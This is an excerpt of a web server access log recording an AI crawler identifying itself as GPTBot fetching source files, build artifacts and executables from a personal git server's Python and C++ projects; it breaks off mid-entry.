"/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 10853] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" -[17/Feb/2026:14:00:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher" [Client 74.7.227.38] [Length 9863] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher" -[17/Feb/2026:14:00:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 10857] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" -[17/Feb/2026:14:00:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 9866] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe" -[17/Feb/2026:14:00:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 9491] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe" -[17/Feb/2026:14:00:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 44916235] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe" -[17/Feb/2026:14:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs" [Client 74.7.227.38] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:14:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 10822] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist" -[17/Feb/2026:14:00:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode" [Client 74.7.227.38] [Length 10062] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" -[17/Feb/2026:14:00:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 12194] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher" -[17/Feb/2026:14:00:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:14:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 44615970] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg" -[17/Feb/2026:14:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 9883] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg" -[17/Feb/2026:14:00:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 9517] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg" -[17/Feb/2026:14:00:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 9525] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" -[17/Feb/2026:14:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 44573707] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" -[17/Feb/2026:14:00:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 522344] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" -[17/Feb/2026:14:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 526125] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" -[17/Feb/2026:14:00:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 9479] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe" -[17/Feb/2026:14:00:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode" [Client 74.7.227.38] [Length 9853] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode" -[17/Feb/2026:14:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 9863] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe" -[17/Feb/2026:14:01:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 44981538] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe" -[17/Feb/2026:14:01:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 635] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:14:01:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 11446] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:14:01:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 29729] [Gzip 8.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" -[17/Feb/2026:14:01:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13479] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 9885] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:14:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 858166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:14:01:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 863930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:14:01:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 9881] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:14:01:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 799945] [Gzip 27.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:14:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 805842] [Gzip 27.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:14:01:23 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:01:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py" [Client 74.7.227.38] [Length 11504] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" -[17/Feb/2026:14:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 21023] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py" -[17/Feb/2026:14:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" [Client 74.7.227.38] [Length 9836] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" -[17/Feb/2026:14:01:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" [Client 74.7.227.38] [Length 9853] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:01:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest" [Client 74.7.227.38] [Length 11650] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" -[17/Feb/2026:14:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest" [Client 74.7.227.38] [Length 11641] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" -[17/Feb/2026:14:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest" [Client 74.7.227.38] [Length 11657] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" -[17/Feb/2026:14:01:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" [Client 74.7.227.38] [Length 12068] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" -[17/Feb/2026:14:01:27 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest" -[17/Feb/2026:14:01:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/packages" [Client 74.7.227.38] [Length 7410] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" -[17/Feb/2026:14:01:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13958] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components" -[17/Feb/2026:14:01:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py" [Client 74.7.227.38] [Length 10634] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py" -[17/Feb/2026:14:01:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py" [Client 74.7.227.38] [Length 9856] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py" -[17/Feb/2026:14:01:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py" [Client 74.7.227.38] [Length 334] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py" -[17/Feb/2026:14:01:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16501] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components" -[17/Feb/2026:14:01:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/README.md" [Client 74.7.227.38] [Length 10891] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest" -[17/Feb/2026:14:01:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/README.md" [Client 74.7.227.38] [Length 10891] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest" -[17/Feb/2026:14:01:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/README.md" [Client 74.7.227.38] [Length 10891] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 